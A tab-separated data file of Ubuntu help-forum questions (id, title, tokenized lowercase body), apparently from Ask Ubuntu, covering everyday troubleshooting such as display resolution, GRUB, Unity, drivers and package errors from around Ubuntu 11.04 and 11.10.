61958	how do i set my screen resolution to the maximum supported resolution ?	used win 7 and got resolution 1280x1024 and when i installed ubuntu 11.04 got resolution of 1152x864 ( made that possible by changing from the advanced option in the nvidia xorg file ) went to system settings and got 'monitor unknown'.using a nvidia 8400gs and using 173 version of driver . xrandr o/p : xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 1152 x 864 , maximum 1152 x 864 default connected 1152x864+0+0 0mm x 0mm 1024x768 50.0 60.0 800x600 51.0 52.0 53.0 680x384 54.0 55.0 640x480 56.0 512x384 57.0 400x300 58.0 320x240 59.0 1152x864 60.0* xorg o/p : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 270.29 ( buildd @ roseapple ) fri feb 25 14:43:24 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : builtin , vertrefresh source : builtin identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-1 '' horizsync 28.0 - 55.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400 gs '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` 1152x864 +0+0 '' subsection `` display '' depth 24 endsubsection endsection planning to use docky but resolution is so low that its waste to use it .
61960	`` multiple active partitions '' error	i already have ubuntu 11.04 ( which i installed with wubi ) and windows 7 . i also want to install ubuntu 11.10 beta . when i boot with the ubuntu usb , i get the error : multiple active partitions . then , i get redirected to the boot options . i think i should also mention that a wubi.exe file is automatically created , although i mounted within ubuntu .
61961	how can i change the system font sizes ?	the default font sizes are much too large for me . in previous versions of ubuntu , i could do this through the `` appearance '' menu , but this option seems to be gone in ubuntu 11.10 beta 1 . is there any way to change the system font sizes in ubuntu 11.10 ?
61963	can i create an ssh login script ?	i have to log in to my school 's linux server for homework . i would like to be able to make a script or something for my desktop to save a bit of time ( using ubuntu desktop ) . currently i log in using the following : ssh verylongname0434 @ linux.myschoolslongurl.net would there be a way to automation this task so i can click an icon ? actually while typing this ... just thinking , would bashrc be a better way than a script ?
61967	the `` power cog '' has disappeared	i am using ubuntu 11.10 beta 1 . the `` power cog '' ( the button at the top right corner of the screen ) seems to have disappeared . i am not sure what caused that because it was there when i installed 11.10 beta 1 . so i do not quite remember . the main thing is that i suspect the problem is either gnome-session or cairo dock . can you help me to get that button back ? and when on 22nd this month beta 2 gets out and i use apt-get dist-upgrade , will it install that button once again ? thanks for your help . if you can not help me , just tell me how to logout ( not shutdown ) using cairo .
61970	how to properly reset all grub/boot settings ?	several symptoms : no splash screen , just a console no ttys available ( ctrl+alt+f1 etc.. ) , just random coloured bars a while ago , i 've used a tutorial to fix plymouth bootsplash resolution and changed settings i do n't quite recall now . what is the proper way to reinstall and reset plymouth and/or grub settings to see if removing my modifications will fix the boot to some acceptable level ? nb : i 've updated to 11.10-beta hoping it would fix the problem , but this originally happened on 11.04 edit : i think the tutorial i followed is this one but i 'm not 100 % sure . also , i think the things mentioned in the tutorial are not the only ones i 've changed , since i 've tried to fix this when it first happened , so i may have messed up other stuff too . this is why i 'm looking for a `` reset all '' solution .
61974	medibuntu repository broke my system	i installed the medibuntu repository using the following comand : sudo wget -- output-document=/etc/apt/sources.list.d/medibuntu.list http : //www.medibuntu.org/sources.list.d/ $ ( lsb_release -cs ) .list & & sudo apt-get -- quiet update & & sudo apt-get -- yes -- quiet -- allow-unauthenticated install medibuntu-keyring & & sudo apt-get -- quiet update when i now want to enter synaptics i gives me the following message : e : problem parsing dependency depends e : error occurred while processing language-pack-sd ( newversion2 ) e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_natty-updates_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . i also cant open the software center . how can i delete the medibuntu repository ?
61975	how to access archive.ubuntu.com from an ipv6 only machine ?	because archive.ubuntu.com has n't any ipv6 endpoints , an ipv6-only ubuntu machine is quite unusable : no package management , no updates , etc . is there any way to overcome this problem without enabling ipv4 ?
61986	how can i get the full screen space in a video ?	i am watching quite often dvds in vlc on ubuntu while surfing . as my screen is n't very big , i do n't want to waste screen space . but i ca n't resize the window exactly to the size of the video . changing the aspect ratio did n't help . here is a screenshot to make clear what i mean : how can i get this screen space ?
61988	how to finish setup of dvd : :rip ?	i had isntalled dvd : rip and trying to finish setup , but while checking dependencies i found out that missed rar , and it 's necessary to install old version ( min 2.71 and max 2.99 ) . by default i could install only 4.0 version through software center ( or synaptic ) . could somebody help me to find and install rar version 2.xx ? thanks in advance . edit : here you can see `` dependency check '' image below .
61992	have to mount the `` data '' partition every time	at my laptop i have one hdd with 2 partitions ( os and data ) . each time ubuntu starts i have to mount it firstly so that i have access to it . i want it to be automatically mounted . how can i do that ? and why it is n't by default ?
61995	chat over lan from linux to linux ?	as i recall there was something like netsend on windows that allowed simple messages to be sent over the local network . i especially like this because one does n't need to install extra client soft ( hello skype ) . is there something dead simple like this on linux ? just to clarify i 'm looking for a bash command or simple cli script/tool , not a gui app .
61997	screen brightness stops working after standby ?	so , i just bought a new laptop yesterday ( toshiba portege r835-p70 ) with an intel graphics accelerator and installed xubuntu 11.04 . everything works fine except after waking from standby . the screen brightness controls stop working . i 've tried `` cat `` brightness:4 '' > /proc/acpi/toshiba/lcd '' , as su , but nothing happens . it works perfectly fine after a fresh boot , but ceases to work after a wake from standby . i looked in the syslog and kern.log and they both give this error after waking from sleep and when i try to change the brightness : sep 18 15:11:15 portege-r835 kernel : [ 102.456526 ] acpi error : [ gtf0 ] namespace lookup failure , ae_not_found ( 20110112/psargs-359 ) sep 18 15:11:15 portege-r835 kernel : [ 102.456531 ] acpi error : method parse/execution failed [ _sb_.pci0.sat0.prt0._sdd ] ( node ffff880147646cd0 ) , ae_not_found ( 20110112/psparse-536 ) sep 18 15:11:15 portege-r835 kernel : [ 102.456550 ] acpi error : [ gtf0 ] namespace lookup failure , ae_not_found ( 20110112/psargs-359 ) sep 18 15:11:15 portege-r835 kernel : [ 102.456554 ] acpi error : method parse/execution failed [ _sb_.pci0.sat0.prt0._gtf ] ( node ffff880147646cf8 ) , ae_not_found ( 20110112/psparse-536 ) sep 18 15:11:15 portege-r835 kernel : [ 102.458177 ] acpi error : [ gtf0 ] namespace lookup failure , ae_not_found ( 20110112/psargs-359 ) sep 18 15:11:15 portege-r835 kernel : [ 102.458181 ] acpi error : method parse/execution failed [ _sb_.pci0.sat0.prt0._sdd ] ( node ffff880147646cd0 ) , ae_not_found ( 20110112/psparse-536 ) sep 18 15:11:15 portege-r835 kernel : [ 102.458193 ] acpi error : [ gtf0 ] namespace lookup failure , ae_not_found ( 20110112/psargs-359 ) sep 18 15:11:15 portege-r835 kernel : [ 102.458196 ] acpi error : method parse/execution failed [ _sb_.pci0.sat0.prt0._gtf ] ( node ffff880147646cf8 ) , ae_not_found ( 20110112/psparse-536 ) sep 18 15:11:23 portege-r835 kernel : [ 110.661102 ] acpi : failed to switch the brightness sep 18 15:11:23 portege-r835 kernel : [ 110.917468 ] acpi : failed to switch the brightness sep 18 15:11:24 portege-r835 kernel : [ 111.196951 ] acpi : failed to switch the brightness any ideas ? is there something i can manually restart that might help ? edit : here 's a pastebin of it . easier to read : http : //pastebin.com/jet8ztaf also happening on the toshiba satellite r830 .
61998	ctrl+c does n't work in rubymine ide	i 'm under ubuntu 11.04 using rubymine ide . i ca n't copy any text from this ide by shortcut key ctrl+c , in another applications it works well . the copy function from context works well in rubymine . interesting fact that i worked with rubymine under ubuntu 11.04 as guest os in virtual machine ( ubuntu was in classic mode ) . shortcut key worked well there . it seems to me that here 's some intersection between ubuntu 's and rubymine 's shortcut keys . how to detect this intersection and how to fix it ? thanks
61999	i have an intel gpu and a amd mobility radeon hd 5400 series gpu , multiple questions	they are the supposed to be switchable , the hybrid graphics page seems to be a little dated ( talking about 10.10 and kernel 2.6 ) i 'm not sure the amd mrhd is working , how can i tell which graphics card the computer is currently using ? i would prefer the amd the intel is supposed to be the `` power saving '' however most of the time my laptop is plugged in i installed the `` ati/amd proprietary fglrx graphics driver '' and that installed the catalyst control center , however when i open the ccc it tells me no amd graphics driver is installed , or the amd driver is not functioning properly . please install the amd driver appropriate for you amd hardware , or configure using > aticonfig . there is another proprietary drive available `` ati fire gl '' but when i try to install that it says systemerror : e : unable to correct problems , you have held broken package now i found the bug page on that but should the first one be sufficient ? i thought i might as well post this for you all , not sure how much help it could be brendon @ brendons-lappy : ~ $ lspci -k 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 subsystem : hewlett-packard company device 144a kernel driver in use : agpgart-intel > 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 kernel driver in use : pcieport > kernel modules : shpchp > 00:02.0 vga compatible controller : intel corporation core processor integrated graphics > controller ( rev 02 ) subsystem : hewlett-packard company device 144a kernel driver in use : i915 kernel modules : i915 > 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci > controller ( rev 06 ) subsystem : hewlett-packard company device 144a kernel driver in use : mei kernel modules : mei > 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced > host controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : ehci_hcd > 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition > audio ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : hda intel kernel modules : snd-hda-intel > 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root > port > 1 ( rev 05 ) kernel driver in use : pcieport kernel modules : shpchp > 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root > port > 2 ( rev 05 ) kernel driver in use : pcieport kernel modules : shpchp > 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced > host controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : ehci_hcd > 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) > 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller > ( rev 05 ) subsystem : hewlett-packard company device 144a kernel modules : itco_wdt > 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata > ahci controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : ahci kernel modules : ahci > 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) subsystem : hewlett-packard company device 144a kernel modules : i2c-i801 > 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset > thermal subsystem ( rev 05 ) subsystem : hewlett-packard company device 144a kernel driver in use : intel ips kernel modules : intel_ips > 01:00.0 vga compatible controller : ati technologies inc manhattan [ mobility radeon hd > 5400 series ] subsystem : hewlett-packard company device 144a kernel driver in use : fglrx_pci kernel modules : fglrx , radeon > 01:00.1 audio device : ati technologies inc manhattan hdmi audio [ mobility radeon hd > 5000 > series ] > > 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic > non-core registers ( rev 02 ) subsystem : hewlett-packard company device 144a > 7f:00.1 host bridge : intel corporation core processor quickpath architecture system > address decoder ( rev 02 ) subsystem : hewlett-packard company device 144a > 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) subsystem : hewlett-packard company device 144a > 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) subsystem : hewlett-packard company device 144a > 7f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : hewlett-packard company device 144a > 7f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) subsystem : hewlett-packard company device 144a edit : just letting you all know i 've been using ubuntu on and off since 7.04 , and know my way basically around it , however it has changed greatly of late
62001	am i using unity or unity 2d ?	unity and unity 2d look very much alike , so how can new users easily find out whether they are running unity or unity 2d ?
62004	how to remove unity and unity-2d ?	i use gnome-shell , and i do not use unity or unity-2d , so i would like to remove those . which packages do i have to remove to get rid of them ( without removing packages i need for gnome-shell ) . sudo aptitude remove ... ? ( please do not mark as duplicate of how can you remove unity ? , since this is another question , and the answer is not in there ; this question is simpler and is about version 11.10 )
62007	how to play vcd ?	for playing vcd in ubuntu somebody proposed to use gxine . however gxine does n't start . when trying to start it from terminal , the response is : /usr/bin/gxine.real : error while loading shared libraries : libmozjs.so : can not open shared object file : no such file or directory vlc doesnt work for me as when i choose the cd it cant read the mrl . any idea ?
62009	how to show windows only from the current workspace in switcher ?	i would like to make the window switcher ( typically invoked with alt-tab ) in unity to show only windows from the current workspace . any help would be greatly appreciated .
62011	how do i remove mounted drives from the unity launcher ?	in 11.10 how do i go about removing the mounted drives icons on the unity launcher ? this article : http : //www.webupd8.org/2011/04/how-to-remove-mounted-drives-from.html does not work , the only option under desktop â unity â devices is favorites : [ ] .
62012	`` apply '' button stays grey in synaptic package manager	i am trying to get rid of old residual config package with synaptic package manager by following this link . it is strange that after select âmark for complete removalâ for some packages , the apply button of the tool stays still grey , i could not click on it ... could anyone help ? thank you very much !
62013	how do i switch default root authorization app ?	somehow i 've messed everything up and when i open a program like time-admin and click `` click to make changes '' , it uses a qt / kde style interface rather than the gtk style . running gksudo appnamehere in the terminal works fine and gives me the normal interface for root authorization . how can i make it where i always get the gtk interface for entering the password again ?
62019	how to activate hdmi as my default output starting from bios , grub , gdm , and desktop ?	ubuntu 11.04 , when i boot , i do not see anything in my hd tv screen . no bios/grub/gdm/desktop . how can i use my default hdmi output please ? note : i have vga port , but i do not use any vga screen/monitor . only for special repairing purpose .
62023	compaq mini netbook , wireless problem	i have a compaq mini and i had just installed ubuntu 10.10 in it and everything runs great . except for the fact that it can only connect to the internet by ethernet connection and not wireless . i had installed ubuntu 10.10 replacing windows 7 enterprise ( do n't ask why i did that ) and it does n't seem to detect any wireless networks nearby .
62027	how do i bridge network interfaces ?	i have a laptop running 11.10 with 2 network interfaces , wired and wireless . wireless interface connects to the router with dhcp and connects to the internet . wired interface is connected to a switch . i want the computers on the switch to get their ip addresses from the router not my laptop . how would i go about setting this up ? bridging the interfaces ?
62030	keyboard incorrectly mapped when using open nx	i seem to be having keyboard issues on ubuntu 11.04 . recently i tried to remote in to my machine using opennx ( http : //opennx.net/ ) and found that my keyboard incorrectly mapped on the client machine . now , after coming back to my host machine and attempting to use it they keyboard reacts the same way as through the opennx client . what 's happening is the 's ' key is mapped to the 'o ' key , return is mapped to '8 ' , and so on . any suggestions on what to try ? thanks for the help .
62032	.xsession-errors is huge after suspending	earlier today i left my laptop suspended and when i came back ( a few hours later ) , i logged in and all my disk space had been used up . i took a look at disk usage analyser and it said all of the space was being used in my home folder . however , nothing was actually that big . what 's hogging all my disk space ?
62033	error with `` nokuntusp '' package when trying to install packages	during any install from ubuntu sofware centre or using the command line , i am getting the following error e : the package nokuntusp needs to be reinstalled , but i ca n't find an archive for it . how to fix it ?
62034	is it possible to set the default behaviour of double clicking a folder to be `` open in new window '' with pcmanfm ?	my mother uses separate desktops heavily and finds it very irritating when she accidentally double-clicks on a folder on her desktop rather than right-clicking and choosing `` open in new window '' as she 's trained herself to usually do . is there a way to set pcmanfm to default to opening in new windows rather than new tabs ? ( she 's using 12.04 ( precise pangolin ) at the moment ) here 's a very rushed screencast explaining the behaviour i 'm talking about .
62035	when i boot up the computer normally , gdm wo n't work	my laptop was working perfectly , but suddenly today i turned it on and after grub , the plymouth splash flashed and then the screen went black with a blinking cursor . after blinking like 6 times , the cursor disappears and the screen stays completely black . ubuntu wo n't boot after that and the computer is non-responsive to ctrl+alt+del , so i have to reboot by holding the power button and then turning it back on . i tried using the recovery mode to see if it was a problem with x or whatever ... but it always seemed to crash when it was going to ask me to login . i did some research on the internet and then tried holding shift while booting up and then pressing 'e ' when grub showed up . i then removed `` quiet splash '' and tried with `` text '' there . computer booted up and i did n't get any errors . logged in with my user and password , and then did a manual startx . after that the laptop starts and runs perfectly , as i 'm using it right now to write this message . i think the problem is something in gdm , but i do n't know what . i thought maybe it was a problem with plymouth , but i imagine failsafex from recovery mode would skip plymouth and just send you to log in . does anybody have any idea how to get gdm to work again ? or any idea what could be wrong with it ?
62038	problem after enabling xinerama	i enabled xinerama and now i cant do anything . all that shows up is my mouse and background . step by step how do i get back to normal ? i also tried opening up programs , perhaps to open catalyst but i cant even do that . and none of the keyboard shortcuts i have tried did anything , as well i can not find a keyboard shortcut to open the terminal to kill this thing . thank you for the help .
62039	why does usb-creator-gtk require root access ?	when you want to create a bootable usb memory stick , then you must identify as a sudoer . why is that ? i have no difficulty understanding why unprivileged users should n't be allowed to fiddle with the installed system , but why should n't you be allowed to copy grub onto the memory stick if you have write access to it ?
62040	pros and cons of different audio transcoders	i 've been experimenting with different audio transcoders like ffmpeg , mplayer and lame . does anyone have a qualitative comparison between the different audio transcoders that can be accessed through the terminal ? in my project i will be using these tools to do only two things transcode a 30 second clip of input.mp3 file to create output.wav crop a 30 second clip of input.mp3 to create output.mp3 without transcoding
62045	how to disable windows + s keystroke in unity	when i do `` windows + s '' in my ubuntu i can see the below effect . can anybody help how to disable this ? thanks in advance
62051	unable to install grub	unfortunately ( as you can see ) i can not install grub . i have tried /dev/sda as well . here is my partitioning schema : troubleshooting + problems : installed windows 8 to logical partition ( somehow got marked `` active '' ) found metro bcd to be lacking ( takes forever to load , does n't have other non-windows oss ) installed easybcd , could n't detect the bcd . so i made my win7 primary the active something stuffed up in its bcd , it redirects to win8 bcd , so i want to make grub default 11.04 grub ca n't be activated for some reason so i download 11.10 x64 beta on my old laptop , push it to a usb , and attempt to install it on my other hard-drive . then i get the first mentioned error . i have also tried ( before and after ) running sudo grub-install manually on the respective drives , to no avail . when i now attempt to boot to the hard-disk , i get pxe boot . please suggest further troubleshooting steps ( e.g . lilo ? ) .
62052	wireless setting -wpa2 enterprise	i 'm setting my wireless environment . i have to use wpa2 enterprise with peap and have to use aes encryption . but i ca n't find where encryption config is . ( ms-windows has the option ) how can i config it ?
62058	bugzilla is not running - access forbidden	i have install bugzilla according to how do i install bugzilla ? i ca n't access the files . apparently /usr/local/ drwxr-xr -- 16 www-data www-data 4096 2011-09-19 09:30 bugzilla-4.0.2/ the link from /var/www/ lrwxrwxrwx 1 www-data www-data 25 2011-09-18 13:53 bugzilla - > /usr/local/bugzilla-4.0.2/ when browsing to : http : //localhost/bugzilla i get : forbidden you do n't have permission to access /bugzilla on this server . apache/2.2.14 ( ubuntu ) server at 192.168.0.22 port 80 how to fix it please ?
62059	is there any game analogous to counter strike ?	i am very much interested in games . is there any game analogous to counter strike for ubuntu ? if yes how to get it ?
62060	how to improve ubuntu resolution ?	i am using ubuntu 10.04 . also i have radeon graphics card 1 gb builtin in my laptop , but my screen resolution is very poor . is this because the drivers of radeon card are missing ? how to get that graphics card properly working ?
62062	how can i compile mono hello world ?	i have ubuntu 11.04 with this mono : mono jit compiler version 2.6.7 ( debian 2.6.7-5ubuntu3 ) copyright ( c ) 2002-2010 novell , inc and contributors . www.mono-project.com tls : __thread gc : included boehm ( with typed gc and parallel mark ) sigsegv : altstack notifications : epoll architecture : x86 disabled : none i 'm trying to run this : using system ; public class helloworld { static public void main ( ) { console.writeline ( `` hello mono world '' ) ; } } and i get those errors : thinkpad-x201-tablet : ~/desktop $ gmcs hello.cs ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : missing method .ctor in assembly /usr/lib/mono/2.0/gmcs.exe , type system.runtime.compilerservices.compilergeneratedattribute ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : the class system.runtime.compilerservices.compilergeneratedattribute could not be loaded , used in gmcs ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : ca n't find custom attr constructor image : /usr/lib/mono/2.0/gmcs.exe mtoken : 0x0a0003d2 ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : missing method .ctor in assembly /usr/lib/mono/2.0/gmcs.exe , type system.runtime.compilerservices.compilergeneratedattribute ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : ca n't find custom attr constructor image : /usr/lib/mono/2.0/gmcs.exe mtoken : 0x0a0003d2 ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : missing method .ctor in assembly /usr/lib/mono/2.0/gmcs.exe , type system.runtime.compilerservices.compilergeneratedattribute ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : ca n't find custom attr constructor image : /usr/lib/mono/2.0/gmcs.exe mtoken : 0x0a0003d2 ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : missing method .ctor in assembly /usr/lib/mono/2.0/gmcs.exe , type system.runtime.compilerservices.compilergeneratedattribute ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : ca n't find custom attr constructor image : /usr/lib/mono/2.0/gmcs.exe mtoken : 0x0a0003d2 ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : missing method .ctor in assembly /usr/lib/mono/2.0/gmcs.exe , type system.runtime.compilerservices.compilergeneratedattribute ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : ca n't find custom attr constructor image : /usr/lib/mono/2.0/gmcs.exe mtoken : 0x0a0003d2 ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : missing method .ctor in assembly /usr/lib/mono/2.0/gmcs.exe , type system.runtime.compilerservices.compilergeneratedattribute ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : ca n't find custom attr constructor image : /usr/lib/mono/2.0/gmcs.exe mtoken : 0x0a0003d2 ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : missing method .ctor in assembly /usr/lib/mono/2.0/gmcs.exe , type system.runtime.compilerservices.compilergeneratedattribute ** ( /usr/lib/mono/2.0/gmcs.exe:9128 ) : warning ** : ca n't find custom attr constructor image : /usr/lib/mono/2.0/gmcs.exe mtoken : 0x0a0003d2 unhandled exception : system.typeloadexception : a type load exception has occurred . any ideas ?
62065	macintosh mouse button emulation	i just run the xinput list command and get the following output : myuser @ my-laptop : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=10 [ slave pointer ( 2 ) ] ⎜ ↳ macintosh mouse button emulation id=12 [ slave pointer ( 2 ) ] ⎜ ↳ tpps/2 ibm trackpoint id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=9 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=11 [ slave keyboard ( 3 ) ] i 'm wondering what is the macintosh mouse button emulation ? a quick google search did n't help too much ... to note that i do n't have any mouse plugged in .
62071	launching a script when someone opens a file through the gui	i 'm not even sure if this is possible or not but this is what i 'm trying to do : everytime a user opens a file through double clicking i want to launch a script which does a few things depending upon what kinda file it is or what directory it 's in . how do i launch a script when the user opens a file ?
62073	how to decide on swap size	i wanted to just confirm how much the size of swap partition should be . lots of places tell that the swap size should be twice the size of ram . somebody also told me that it should n't be more than 8 gb.if twice the size of ram is more than 8 gb how big should the swap partition be ?
62074	is it possible to hide unity 's panel on a second monitor ?	i 'm using v3.8 . curious if it is possible in 4.x ?
62081	gnome shell hot corner not working	i 'm using ubuntu 11.10 in virtual box ( windows xp host ) . so far i have : installed the gnome-shell purged the gnome-accessibility-themes installed the gnome-standard-themes used gnome-tweak-tool to select the correct window themes etc . everything seems to work except the `` hot corner '' i.e . when you move the mouse to the corner of the activities corner there used to be a ripple effect ( at least in fedora 15 when i first tested gnome-shell ) . any thoughts ?
62083	latest wine update broke levelator ( ca n't start it now ) , what can be done about it ?	i have been running conversation network 's levelator for a couple of years without problem . with the latest wine ( 1.3.28 ) it wo n't start . it gives me the `` encountered a serious problem '' dialog and in the terminal shows fixme : actctx : parse_depend_manifests could not find dependent assembly l '' microsoft.windows.common-controls '' ( 6.0.0.0 ) fixme : actctx : parse_depend_manifests could not find dependent assembly l '' microsoft.windows.common-controls '' ( 6.0.0.0 ) wine : unhandled page fault on read access to 0x00000400 at address 0x68486a63 ( thread 0009 ) i 'm not sure where to go from here , is there anything i can set , can i easily roll back to a previous wine ?
62085	how to make my 19 '' monitor default display output when i connect it to my netbook ?	i am new to linux , so i am still learning tricks and ways of personalisation . i have asus eee pc 1015pem netbook and 19 '' monitor . is it posible that when i connect monitor to vga port of netbook that monitor become deafult display with resolution 1440x900 , and netbook display to turn blank so i can close it ? generaly i want to use netbook like pc case . thanx in advance .
62086	recover files in ubuntu from usb stick	i have ubuntu 11.04 running from a usb stick . i think i ran some updates in terminal and now it has a kernel panic during boot up . is there a way i can get hold of files i saved when ubuntu was working ? i just managed to watch the booot screen and it looks as if there are some errors saying there is no room to write to disk however my usb stick has 5gb free update : here is what i see when i plug the usb stick into windows
62087	ubuntu one cors support	i am in the process of trying to build a webapp that integrates with ubuntu one . it would seem that i am unable to authorize a user as per https : //one.ubuntu.com/developer/account_admin/limited_tokens/cloud/ using javascript due to a lack of cors http : //www.w3.org/tr/cors/ implementation which allows cross domain javascript loading . will there be any future plans to support a more webapp friendly approach to authentication ?
62090	graphire cte-640 pad wheel stops working after a minute	i have a wacom cte-640 ; it used to work fine before , only after upgrading to ubuntu 11.04 that i found that the scroll wheel and the buttons on the pad does not work . however , i have also observed that immediately after plugging in the device the wheel works for a minute or so , and then it again stops working . please can you help me to fix this problem .
62092	how do i remove the me-user-indicator from the panel ?	how do i remove the me-user-indicator from the panel in 11.10 ? the indicator contains two items : the written user name and the icon of a human .
62094	how do i fix an error while updating packages cache ?	when i try to update in ubuntu 11.04 after installation , i get the following error e : some index files failed to download . they have been ignored , or old ones used instead . i tried the following command still the same error sudo rm /var/lib/apt/lists/* -vf sudo apt-get update please help me .
62095	how to alias 'git ' to 'g ' so that bash-completion rules are preserved ?	if i do this : alias g='git' i loose all completion rules ( i.e . branches and remotes are no longer being automatically completed when i hit tab after typing , for example g push o ) .
62096	apache userdir and permissions to write public_html ( suphp ) ?	i have set ubuntu 10.10 server with lamp . i use userdir mod for apache , but when i install some cms systems for user like concrete5 , i need to set chmod 777 to some directorys to write data with cms . is it possible to add some permissions for apache , so that i do n't need to use chmod command . i have read something about suphp . is it good for this ?
62097	gimp colours do not fill correctly	this is probably a very easy question , but i am stumped . i am trying to edit a png . i select a colour with the `` select by color '' tool , change the fill colour to red ff0000 , or 255,0,0 , but when i click the selection to fill , it looks brown . other colours also act this way : blue - > purple , yellow - > light brown , etc . white seems to fill correctly . so , what am i doing wrong ? i 'm thinking it has to do with the file format or some underlying filter .
62099	how can i toggle between single and dual monitor setup ?	i have two monitors working just right with nvidia driver . there are times , however , where i want to have just one monitor and other times where i need two : i must open nvidia xserver settings , go to the xserver display configuration and change the second monitor from twinview to disabled ( and vice-versa ) . is there a way to just toggle that ? for example having a shortcut on desktop and/or on the unity dock ? maybe is there a way to configure a keyboard shortcut to achieve this ? p.s . : i 'm using 11.04 with unity and , of course , compiz .
62102	how do i get rid of all the unity bars ?	to make my question as simple as possible , i 'll start with showing my desktop , so that i do n't need to describe everything in words : basically this is how i have been using ubuntu 10.04 since it 's been released : all ubuntu/gnome panels erased and only awn ( awant window navigator ) running on the left side of the screen . how possible is it to get as close to this look as possible in ubuntu 11.10 without downgrading to gnome 2 ? possible solutions i can roughly think of , but am not sure how to accomplish them : 1 ) use unity interface , hide the unity launcher and try to get used to the necessary top panel ( i do n't think that can be erased , or can it ? ) 2 ) use gnome interface and somehow erase all the panels/launchers ?
62107	is it possible to install an app from google chrome web store like angry birds so that it is available to all users ?	i use google chrome at home and recently i installed angrybirds from the webstore but to my surprise it was n't available on my wife 's account . is it possible to install chrome apps such that they are available on all user accounts on the system and does n't require installing for individual users . this will save some disk space and help me save time by not installing every app twice . update : i am not talking about app shortcuts that we can create with chrome . i am talking about chrome apps which can be installed from chrome web store https : //chrome.google.com/webstore ? hl=en-us e.g angry birds , pacman and others
62115	how to install libraries ?	when i was installing the application ( tracker-0.10.24 ) i 've got this message : package requirements ( glib-2.0 > = 2.26.0 gobject-2.0 > = 2.26.0 gio-unix-2.0 > = 2.26.0 dbus-1 > = 1.3.1 dbus-glib-1 > = 0.82 ) were not met : no package 'dbus-1 ' found no package 'dbus-glib-1 ' found i can go to ubuntu packages and install them step by step , but i think here 's should be more convenient way . how to install all these libraries ?
62118	copying files to an ntfs marks them as `` shared '' in vista	i can mount and copy files to an ntfs partition just fine from ubuntu . however all the folders i copy end up being market as `` shared '' ( `` freigabe '' in german ) when viewed from windows vista side and i have to manually unshare them on vista . what is causing the files to be marked as shared and how can i avoid that from happening ?
